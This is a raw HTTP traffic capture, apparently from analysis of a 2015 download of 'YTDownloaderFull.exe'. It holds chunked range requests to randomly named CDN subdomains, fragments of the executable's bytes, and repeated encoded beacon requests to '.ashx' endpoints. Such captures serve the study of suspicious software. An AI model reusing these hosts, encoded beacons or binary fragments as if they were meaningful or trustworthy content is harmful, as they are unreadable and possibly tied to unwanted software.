.../L.B....-.CN>.0_'.........E..s....g..=... l.....k...5......<H
.a.# U,..i.!..)......n/A..<..K.}.r.s(%.\..o.w...{N#.b.3d..M.c..l...
J...6.v%...iB^....o.j.............C(_..... y.38..k .......,.^.....:.H.
iB..X^|$-#.x]...kD..d..6-..?........h...1......~.....?.g.7...{..m[b*..
.....^.:=pm..'..n%.H...@_.#..v..d....}.DS..O.E%..C7O..n...I.7....^.N..
........4.x.......b..D)..5y>...nK=..Fcf..F..![@...Z .-.E..j.S2..^..
A.v...C.]....Z... [email protected]|bO....7.(.`.\.HWDk...Q...'wu
.e......D.Fu.e#.=......G.%..i.W..V....-..s/?|..U..............&....Di.
.l.C.....d..OW.v...`.0...J..ya6J......dO......e..a=cT(.F....N..,.=..-.
.....99!:@.2...2.......1..*2.4..-.J:.[t...}..w..c5....Y....4Y.....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1750000-1999999/5107690
....0.HD.... ...k'....*@..%..m.i........:.....2..?..!..~..&x...2..ks..
..J'..OO.$.`........{w...|..0.C.......f.....eo..j...H.{d.c...ud(,2{g.=
......?....F........3c..:. .1..vPfAu,BD.>.GB<z../...O3"..../.C..
....}[........>q...,=9U3.]........?.....J......[..l......v........c
iM.q...1I.G.....M....j.3.G.ek.?.....|;.o......9.:!n......w3.71..7*.F..
...*.jj.r2... .[.zN$6.....I..a..ou..|./I..{..K:X..<.8..\2n.`...,...
[email protected].."9..`E.hZ..Y.I[..&...-.(.X.1......(....9.%.....Hh..
..m.Br...$.......7.....b.B...yY..q.r.>nF.s...........yt.8...4x-..-.
..K.Y.d[..=Ax)....TD...!.M.1.]....&._..J.~.Z.sH..L..,.s....6.(.>...
8..@F,..7..;.......O..vL.ZD...4.Wg.e...aw......Sg.y.(..........)...mZ.
2.{m........j0....F....z...p...........Q2E.V.............e.G..x!./4...
&.....;.....qT.._..S.P....:.........ZZ.kQ.r..k......R>.I..vdG...\..
M\6A..m....;.....x.....y....Z.z.......V..p..l..z.{f.%.......S...d..Uj.
........;.dd.r.@....].......Q..p.QB,;.%...l. .h.LZ..}.c.../.N...&...C.
..{i7.?............./x..$.zd....B\...}W.?.S2.../.BW....(Y....ZI...Z...
^.5fy$D.>..!ek>*.....-h....k ....e\..M8.B.......k...GQ...|9.....
;gP.wE.PuDGT.{..7...U.c.5......P...i...<>.A.......)".P.h.....a..
...........Hc..#.W.=L..x.p...D4..%@...|........o...bAW...e.a..(.<..
/.5.."....?.S...6...M..W)q..%.2!....YktK......U#..)..-..!...xx..|.S...
.2..Y........S_.....~:.G....c..-.c-&c..nv...t...f...w.j....6.....E}.?.
...Gz...#.y.V..j.7.?...>.).s.x...3....Bh.a....$".......UH.......^)N
.]....o;..C...:^.N.Ll..H.BHe.i....s..V .nz..vz..!.G.gE.N]' ..=.Pc.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2250000-2499999/5107690
P..Z...E.F.iSI..8....T.."-h..J...d...w=...~~J....6..kc0...f.="....s..X
h.oS..3{{...B/...tL.1..z....\^.S'.k.Y..U............@)B......t...8x"..
]]..1..^.3........0.g......y.......4.ae_.9.3..N>.......^.........p.
.p=...,N:~....U..N.S....,U.`..e...."...}...L.U.....|.>;Y.......&.~.
...................;oj.&..~...j;'....h..V.AV..^..........4X^).....Z.1.
[email protected].{.W.!s.X.. :...Wu...[.......M..sV.@.?..[...&G..,y.y..:
@.Z#.z.R%4...R)8_...i....jZ.. .._v.A......H.......p..sL.FJ^..w.7......
......gtc).W.t...../..A.Y....wE...No..G<q..N\M.?....|.(...........3
D.j..E..7.....nA.J...CI...kv..E.v[.H....6..\........O9y......*..&..XT&
..s{..........x...WAYcNq..Qj}tD......#..`R.Q..f...h..L..0..O.,..%.Gn..
.4Jy.\..Nq..$.3..Hv.!/...tl. ..R...j.....ge...X-.1~..U....g.......T'}.
..V.8..YX.]...H6k...C.`..CT.........c.2....,.....p..N....E.O@.^. ..7[.
....JWu..%.`]l.w...,.....(k.SI....s.Wn,A?....Y.....*.....&x..T.r#.....
..S-x:....3... ..{.#...>.8Hp....b.......mBuG...T../([email protected]
|......<w.4.~"P....?).......8...y...3.SY.....I.s.{.P.l.m........x..
..M...=.x....<...I.$.G2.y...Jy.KDi.V1..F..6<....Z..Q&....p.\....
....o..Q..i.[.."..O^.O.F.c.w/\.1...V......:...k......e.Bq,,..O....._.h
.&.#..g....U...3.s....\`[email protected]..!.d..we.uZ.:.,.Cf..W..X
.Z|.Ui.;U.Ob.T'.Z..W}1.....X........K.a../1..{~$J..9/.5.GY.zg....,x]..
).....m<.B...u.. .d.V...z..&%;S...,......'A.1..P.n....2..6.....o.&g
t;..q..............>...E-.......Z.5."/.VZ...b...=......}..05...D.."
!.{.Up.....f...j4....QL..*......Ndj''.f*.......Y....a.......}gc|./<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2750000-2999999/5107690
=...=....N*.Q.....0.....9aj..6...~...O.......zEw....0....8..{....sT...
q....Z.K..h.?../!a dki ..&c.qL.H.....9..y...='.xH....nl.B.L....b R..M.
t..y.!n..K.A.F..V.H,[email protected].'.ld...P.|.........V..8O.
.......7......M?v.Cs..U5.D...eb8I?.J~......&.....kP....X(..`...E......
.......x..H.....!/....^.[..VH...Rv.1..._.=....>...S...[......~X.L&g
t;....l1^...$..J).N.?V]d..{...^..S..|..cL..O.2...9...W.........F.rj...
R.<..H.... H.....}.....Wf..*/.....=....V.$n.{..)<f7m|..zt...u.|@
....e.O#.f.UUfh....".v..a.....s.B.....[.~"..Z....&.&..z.:Z#.i*..Or.Y..
............[...=aMY...,..}....Yz..0...<..qAR2..ZW..;...8....7...Lf
.&..K...)..K.C.O% .p...p.....H...r...E..e{S..c\;...w}.5`b-.......I....
..W.I:.}..T........`..p......]Of3....H,..v..2.$,k..5..y.7..f...-`....q
........Z%.I^.~.;[E..E.m&....$.M}/...&.k ..!#..n.V.kq....4.....V......
..cdC......j*..J';........P....-I..$.H.f.b.d...... .m..t.Y...1l~..~L8x
.x.."q...d.}n9...L.......q\...<.q...e"....D.:.3._.........\.Q.=.ms.
..N.. .....G.!.M^...t\d.2....(... -...}~.n...y.mu.....'".....q1M&....B
@.b.0fk..(8.-7_...$&.$..%S.f.<..W.1....R....u.>.n,..B&^..Z.b..j.
.../...N.VsD.90...|.%..#'-.....Z....)"...4y.^a....hL..<.......YY...
....:....S.'...M.....z".&. .zM...)......,.D.w.U.....5q.#s.....[..t.{..
./. ..ff.Y...U4N..z.x.n 8.>Xc..U..'...k..C..3...&.?.j-..4By..2!...\
,._...`...^...>[email protected].&?.k......t.=.o....D:1....t.....5
.D}y8../...r#`..2....s[_G..=.2..x..z..#.p?i'..v.....f/.../W..R......$.
..v...AIe.?.s ......:R...,.Du.U..q....$#.B.=....a.[.. ..G.M7......<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3250000-3499999/5107690
.p^.H".-|W...R...r.!.....W.........).$....{|....R.|...W....J#....<0
(@W....  .I...........:2.L....S...)}.6.*.=~2~S|t.`".....>...0X.*.t.
...Id..Ey.Lx.r..aM.....^[email protected]...{......8.x......
....}e.0 ....7.7#[email protected].]
[email protected]./.IOMj`..K!.O.......,lg?w..@.?j.)*....<.HZ..Yu...i-.a
........!g..v-1.|.[p.i.....)........4..fo..~..&x.>x....9E.....v....
.''9.).........,L......n.{@..x...#.E..e....Q.....v.q...R.#....]u.2..^.
*u| .<...V..}k%.H...R=.....5.$L.B.][...........D{v...,......'ql...9
DXx.}.UX.g.o.k.p....^....IR.....c8&#...E....K=..w......i.|.Ee.6<.2.
LQ?\._..>......C."./.Jq.....9[).........E...#4.?.u....=.q.ZM.~k....
...rO..^....0y........ ..bB..i....y.....!B.X..H .q.NLSS4[....M..gL....
`.....:2.0'9.y......x.).\[email protected]........)....'.,:v.....2O4.@^..
sk.U.t"r0/.h._./[email protected].`.k.c.v..36..b.u<.....E.#:..8....r_Q..T:
C..r~.H. .m>....0M<.% *.46..*.?w.......-.0o...:.w.O.m..F...A..;.
[Q..U......o......s...x..1 ..o.s.Y.b.P.I|.[.K.fs..z.[F..2r_...../....6
..Y&.5..O..1.....0..H....(%..E....);.9.z.T;.^.......-o...b.y.C......{.
.$.n..P..;.=..E.q?"...{..;WhH....u...t...l..<P...."J.y...r..{......
U$....].1...~.1.7H%....1..S..%.c......([email protected][}...............x...K....
.;.w.....`s..@.~m...M:J.Rm<#"y......[G....{xR..w...IQ.FF....1...1..
...d..o./...wFU.".c{...). ..%..Q.0.......r.m;.....}.)...."=..E...&}..4
....^.6m.....F....d..@y.>.....Y.l..i...U...bj...zh&-z>.......e..
....E%.3D....WtP&...M.2....B@.....,.a.=.....'0..B....'..p..F.....E<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3750000-3999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3750000-3999999/5107690
."1..b'.<.....A.$~...8......Q.^.. &#..nx<6/e....Y.C.S..Mj.O...;M
c.. ..$.Bw.....[.yt..i.....j.z>.......^.m.............Z..X.H....Q..
...1.].p.(.Lx.P...`...K.g.C..mc.X......4.....&..Y{..>.c......t....U
t.....{....OI.^`....{...~..[..S>..^!....-..-.djc..W......c...s<.
X.....%..L.P.84.P>.....J........%..\.,\.B.....x...@!,..G.....7...O.
..7..$...J.x............8o....m..1..R....r.... ..ma..oV.g....47...<
.V...#8Vb....x}~|.g.eM(....F.z.H...E..NxG.;....s.ga....>..,..cxsG..
..u....h~...s4..Ij0....J.......%......3.....8.~w6....l",.....q...4k...
\A..V.b....Q..U...0t;m...e......x.....{..[.....k.9|g..=....f..Q....4.#
H..M6...0X.....c.^{.qo....J.W.....?.}...D.....LK..@.$.....A.uS.AR|..o.
.*......a...-..4.r......!.....Q...w.<W..IW..yhh._.L...2O..Ps...I.k.
=w...K[.....[.9....Q>...w....F.F.c.." ...d...{..LZ"......^..c6.7...
)C..Z.w.&/"d........K..Af.s....u.)...'V9.....u....|.<..3..L.'w. Y.?
......BvId...?...3.p..aR..Q...<v.2.A....|.....7..)................c
/[email protected].,...........;F.......5.w.].-).p..Oh..WJ..pE.....
..&..v?..`.SQ..xA...L.{ :.\.V...]..R...I.^.;`.. x...U5Hn.g....q .'....
.G}..*....X&o..s..z7% .e............L,..x)...S.&^dx...4..0.]..,.4...:R
3......aG.!.u.K.l0..'.f"..E.2)&.....c...jr.\.....Q.E...icL-?2.l3mN7`(.
pz!S.....4v..Q.L...v.:~......G.F^.'}.....y....T.}P..........DZ....0..B
.d7.R".K....:[email protected].;$].xB.o.......|.B..YvC,b)..v...y....r....>
;..........&I.)L.U.........w.dn...O....9..^.O1T.A.p1*K....Z..*.Jg..X. 
5.=:p...=7;.E.4.....=%*[email protected]'....T.2.;....cQ.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4250000-4499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4250000-4499999/5107690
..b...Q.H..._...........]{...|Z.8H.....~.8...0.X[[email protected](@.U
..O..M.3(#....m..(....<h.bT.....D....-*]G.......C.}....m#r..m....^.
..R.....6....n.Sj58.PF..xb..BP.xx.J...#&.ziQ}-.....Y....n.....O..Hd|.(
.".g..W..... ...L...k...5...E.}M.n$&7Il.XD.....m.h.o....T..!-..}...?..
6xR]EK.P.4.."..H.vy!...C.Va.#...A).@..?N.R.?F..p.....b....uplaj.r&.o[c
.'.R.D.S.,=.h......Y.y.|N..h"K......!=*...&U...#.p.<.;....d5...K...
._..Z....[...G.....Kf....\D....../.g.....MC.z.v..f.p...E."......g...[.
.l..ux`...(..Je.b..az.Y\.................N....D.;.8.:-].ce...V..."...c
..9..1..a.^ ..%....5...Q..i.g...^4%>......%....D=.x.t...._].1.P...#
;.GO.......5 .#.........xQ......}..v....#....5...#...d...!.AFn..N..*..
c.&.`X.0...u...f......O.WW....`d...l.n.Rq....'...K.|G.......q...._.8..
.^.......O....K8..z.td......(.An..e[.[R%~.^..E..d].H/.X.Q...\.L^...|.[
...)>B.#cC.jc...........rF'.`..|XY.......e....... .^..^}.5..f.4...z
v......7y..W........uV .re.76....EO.A..qO.3et._e..d....5.n!.`3...:l..Z
bJ1....... .....f.r-.bX.:.5!*J1..q.....:...s.....C....h.*j....c..V...6
....!=.q......q....,.J.Q._q.{...h...GS.>..v(.....z........M..xS..4.
.q..U....f.jx...u..9.....)...!5..Y.;i.Q.?..)......s......N.41..o.f.%W.
a..o.G...!W.O$.f_..<...&.....ilPsV9....G..8..Wg....\*F.b.....>..
6.0..5h|.@k..@..#f....>...'..:=..&OAtuU.i..`C..=%1...o....)...$....
..........54.3...Z.$.C..'.._.........GS.(.......}m<....X.z.... {...
[email protected]...*@....D.UN....<f..8.Qq..;[email protected]..?...
.....?<}.*....<ii..)....A.....v...(R.{.9|l....K.pV/.^..2.d..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4750000-4999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4750000-4999999/5107690
k..=...".....r..O..#.,.*...P#.X........w.n...Fp.....f..:..P<)D.(...
..J.O.I.%....I[x5.1.3z..w..I.2Z..........@...#....).........r...L.g..{
}...el..........\.....d...........^D..w..(.....x^..l.....(.0......?...
'...V.....$T:T.~...F.x*..y...S...r.z.Tt.i....]6..0u...x...!...z.... ..
\.8a1....B/{.?".$>N_..E..`H..eB.YAG>:.h.yS..R...r....S ......F..
X4>ke...(.X.... .~..=s.j..F......A....i.C..3.........k.....L..{.p..
..cht{..{..%...c..1X.....%...:.....3l..;z....5Mr6MND...0....8..y....W3
..l.....|.l&..z...4....".oN..N.<..H.]C...Gc.\.l.. .*.!.d..n.f......
..).C....3..J...c...F.gl.]..&.$:...T.$%>[email protected]#-B.x]b.....
X.Hv.a..o...O.U..K......g.....o.O.d.-..@...D.-.l....j.x.j.lB.g.2.N-E0X
.....FR.X.A.w..e..CL...#..D.#`...*`[email protected]_Q.Y.15]0.......Y..bK_.....`|
..O..C2..\P./=,...'.|.......S.....o.i. ....\...E....]...@/~.M&Y....% U
..P.s..>f:4.'..Ay.....O.e..-.......(..H....5mO...4)>u[...t.)..v|
..."..i.......x...eI.7(..L.*.m.e....jX..T.4<..{....<...-..{.3.|.
.M./........"..<..:..g]........E...Y.........Pm\6...G........,...wb
...Z....z.t_b......%|.......<.Z.).*..Y...o*......:.Hi.!\......$<
.t..i.A.v.Lr.iB..>j[......2.a.(.Oc..t....$&.&.......eN..#.}.[...q..
...~.5..0.5VJ...o*[email protected]....../.g.J....P..~z.... ...O..m9......3.Q.
.D........k)..../.g...C.......5.3.(...~.....sN._i.Ot.c.C7..{.....T.Z.|
....r.x.|.....qC.Iw.. #.....>...=.D...........Pb.g.;...~...O.~}.'.u
[email protected]./[email protected].<.n/e...hO..t..o 
......)L..?...6E"......&.~..y.X.U..$.0...UE...%....l2..4......i(.q<<< skipped >>>

GET /p.ashx?e=hXeqmv1IpelezyBKiN6u N1vyTAtA4H6YDEAjQn1Lmtt1izXJZF/6vvyuZBJPUqNl5HByWpqmAJFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjzLYAxbXqOnWZKpgXCSq4SDnn5VSfoN/21 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykcF31vgH 2Mri4btG OZIk/2mmPmExLeVKUfdGpw3nUgo1AB0/J1xV VzROXqj/RlgPr3Ugg3/8WtyvhlGeipNVNIPaRbv9tSE6xlJd0h7/gbpA3OICltclTTHWShtgC3tHeY4VvF6cr5U0 aUQ/m crqPmttmFAsg= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:40 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: l62kUjuIPVNx7G1FsC4ppFRMgM_RrMyJBM7930TqG2jwBeFcaaQRig==

....

GET /p.ashx?e=AmLJM6c3sNcinMwQKODRlH//a oiiAE7afZ 1lgBdJh98I3OtgNDmPNwq/ptTPwxG04r2GZQbxA4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1YdEo/sIoh/7X9xJ7cHCGG3Wov6VrYoypQSW6B2fRivsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn51tQUcd/Mb9Q48VIs1kHEk9UB7N1/dopRDky3Dqn1Tl0phfdOL Ldgzss114wpp3H HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:40 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: zPfg3FQwUURmkkXphZQ8DiDupSGqVCsuvI0ijQ7v5Qt0e3W3-ml86Q==

....

GET /p.ashx?e=j7YMo/n29XPJd3Cl8WpRrjRFyso9cgVYCqZ8E6fZMGYegceCn LKWe/lQO2eO0N8r J80GV4qARlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJQzpy6nz8DG6TnR9dT7ayg3fHrFM BTebXDbzJkSidOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhSn4/c5CbCMCXDyhRDL0PLamQc6wesLGsUQTxIUcsgQ w4nb2Tq9zCss8dzLecdpLzg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:41 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: rsaUVZaJw4_skUSuwsfw2kDFJNoEtIHY1DDcc8sBPD_oRmGJNacU8w==

....

GET /p.ashx?e=hWfaA75NtHH85nz5m58wW3Ryfx22RDGQQn7xBp tRz8r4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AefUXC4FfWEqIYCpHZc9ZUaF11Cw3 PgSWkz214Ep0g7IOZQPJMLBJ9NumKmesFqXQXZNzCg/DopP HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:41 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WHq4Jy6YNRqMj_JfJBuSA1Bt9FXVKMWT3GE3j9fTPtLVD4LOcYnqOg==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Thu, 10 Sep 2015 07:25:41 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401
5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: WHq4Jy6YNRqMj_JfJBuSA1Bt9
FXVKMWT3GE3j9fTPtLVD4LOcYnqOg==......

GET /p.ashx?e=1ZEnpGuz/IRMWLJLfNOM3nRyfx22RDGQ 3BljJYGbcAr4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AeeOz7ih67i0zYCpHZc9ZUaHn8nmukLEERo4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:41 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: ORqCn1r7rVwHYLmImI3rYHBGKpKqyy5LVnZm-jz66VlcbYWvBFU6Tw==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Thu, 10 Sep 2015 07:25:41 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401
5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: ORqCn1r7rVwHYLmImI3rYHBGK
pKqyy5LVnZm-jz66VlcbYWvBFU6Tw==..

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWAeEuJy eF9fKYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjHOaQfG PYhFdyCvyDAKOhHFvw7Pc3KS KnGzlfE2ZWU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWPa HuGTRyAEFAL52sIXt4Ua8Zp/ 13YC175vqqyfEnMnylXnslTRg848241y0s0/3gUxyF5wkLuxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1 3McsuF4cIQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWLqfIekNLhs5jgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYqi3Apbk6qiCP3BdDD5/c0cA0ak5bBzFhOSDd4/R9r/g== HTTP/1.1

